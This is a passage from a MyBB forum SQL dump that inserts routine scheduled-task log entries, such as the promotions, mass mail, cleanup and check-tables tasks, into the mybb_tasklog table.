'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12124', '9', '1350918688', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12125', '5', '1350919701', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12126', '9', '1350919729', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12127', '3', '1350919908', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12128', '9', '1350921683', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12129', '5', '1350921693', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12130', '3', '1350921757', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12131', '1', '1350921783', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12132', '7', '1350921789', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12133', '5', '1350921917', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12134', '9', '1350922716', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12135', '5', '1350923375', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12136', '9', '1350923379', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12137', '3', '1350923561', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12138', '9', '1350925540', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12139', '5', '1350925564', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12140', '3', '1350925687', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12141', '1', '1350925693', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12142', '7', '1350925764', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12143', '9', '1350926117', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12144', '5', '1350926703', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12145', '9', '1350926710', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12146', '3', '1350927122', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12147', '9', '1350927777', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12148', '5', '1350927913', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12149', '9', '1350928693', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12150', '3', '1350928744', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12151', '1', '1350930242', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12152', '7', '1350930405', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12153', '5', '1350930428', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12154', '9', '1350930618', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12155', '3', '1350930844', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12156', '9', '1350931500', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12157', '5', '1350931724', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12158', '9', '1350932485', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12159', '3', '1350932626', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12160', '1', '1350932685', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12161', '7', '1350932784', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12162', '5', '1350933497', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12163', '9', '1350934171', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12164', '5', '1350935006', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12165', '3', '1350935101', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12166', '9', '1350935138', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12167', '5', '1350935182', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12168', '9', '1350936676', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12169', '3', '1350936682', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12170', '1', '1350936688', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12171', '7', '1350936704', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12172', '5', '1350936709', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12173', '5', '1350937521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12174', '9', '1350937556', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12175', '3', '1350937813', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12176', '9', '1350938409', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12177', '5', '1350938808', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12178', '9', '1350939368', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12179', '3', '1350939560', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12180', '1', '1350939616', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12181', '7', '1350939632', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12182', '5', '1350939911', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12183', '9', '1350940219', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12184', '5', '1350941225', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12185', '9', '1350941419', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12186', '3', '1350941477', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12187', '9', '1350942429', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12188', '5', '1350942431', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12189', '9', '1350943002', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12190', '3', '1350943160', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12191', '1', '1350943300', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12192', '7', '1350943305', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12193', '5', '1350943509', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12194', '9', '1350943898', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12195', '5', '1350945960', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12196', '9', '1350946037', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12197', '3', '1350946507', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12198', '9', '1350946671', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12199', '3', '1350946792', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12200', '1', '1350946839', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12201', '7', '1350946841', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12202', '5', '1350947180', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12203', '9', '1350949784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12204', '5', '1350949844', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12205', '3', '1350949880', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12206', '9', '1350951748', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12207', '3', '1350952707', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12208', '1', '1350952787', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12209', '2', '1350952816', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12210', '7', '1350952965', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12211', '11', '1350953053', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12212', '5', '1350953134', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12213', '9', '1350953307', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12214', '9', '1350954047', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12215', '3', '1350955812', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12216', '1', '1350957012', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12217', '7', '1350959426', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12218', '5', '1350959644', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12219', '9', '1350960817', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12220', '3', '1350960818', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12221', '1', '1350961219', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12222', '5', '1350961234', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12223', '9', '1350962176', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12224', '3', '1350962432', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12225', '7', '1350962593', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12226', '5', '1350962742', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12227', '9', '1350962925', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12228', '3', '1350963160', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12229', '9', '1350964071', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12230', '5', '1350964280', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12231', '9', '1350964716', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12232', '3', '1350964840', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12233', '1', '1350964852', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12234', '7', '1350964882', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12235', '5', '1350965524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12236', '9', '1350967370', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12237', '5', '1350967963', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12238', '3', '1350968570', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12239', '9', '1350970317', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12240', '1', '1350970323', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12241', '7', '1350970329', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12242', '5', '1350970337', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12243', '3', '1350970778', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12244', '9', '1350970962', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12245', '5', '1350971116', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12246', '9', '1350973766', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12247', '3', '1350973769', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12248', '1', '1350973820', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12249', '7', '1350973826', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12250', '5', '1350973829', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12251', '3', '1350973997', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12252', '9', '1350975006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12253', '5', '1350975338', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12254', '9', '1350975378', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12255', '3', '1350975553', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12256', '1', '1350977397', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12257', '7', '1350977415', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12258', '5', '1350977458', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12259', '9', '1350977712', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12260', '3', '1350977730', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12261', '9', '1350978054', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12262', '5', '1350978337', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12263', '9', '1350980189', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12264', '3', '1350980193', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12265', '1', '1350980199', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12266', '7', '1350980223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12267', '5', '1350980233', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12268', '5', '1350980914', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12269', '9', '1350980929', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12270', '3', '1350981037', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12271', '9', '1350989453', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12272', '5', '1350991360', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12273', '3', '1350991367', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12274', '1', '1350991390', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12275', '7', '1350991406', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12276', '9', '1350991544', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12277', '5', '1350992026', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12278', '3', '1350992056', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12279', '9', '1350992913', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12280', '5', '1350992917', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12281', '9', '1350993559', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12282', '3', '1350993562', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12283', '1', '1350993608', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12284', '4', '1350993672', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12285', '7', '1350993701', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12286', '5', '1350993902', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12287', '9', '1350994349', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12288', '5', '1350995350', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12289', '9', '1350995426', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12290', '3', '1350995433', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12291', '9', '1350997815', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12292', '5', '1350998005', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12293', '3', '1350998011', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12294', '1', '1350998028', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12295', '7', '1350998061', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12296', '5', '1350998702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12297', '9', '1350998895', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12298', '3', '1350999051', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12299', '9', '1350999744', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12300', '5', '1351000183', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12301', '9', '1351005053', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12302', '3', '1351005245', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12303', '1', '1351005316', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12304', '7', '1351005320', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12305', '5', '1351005330', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12306', '5', '1351006691', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12307', '9', '1351006702', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12308', '3', '1351006716', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12309', '9', '1351007446', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12310', '5', '1351007452', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12311', '9', '1351009670', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12312', '3', '1351011651', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12313', '1', '1351011666', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12314', '7', '1351011669', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12315', '5', '1351011691', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12316', '9', '1351011740', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12317', '5', '1351012009', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12318', '9', '1351012344', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12319', '5', '1351014224', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12320', '9', '1351014592', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12321', '3', '1351015069', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12322', '5', '1351015088', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12323', '9', '1351015711', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12324', '3', '1351016699', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12325', '1', '1351017272', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12326', '7', '1351017276', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12327', '5', '1351017277', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12328', '9', '1351017374', 'The mass mail 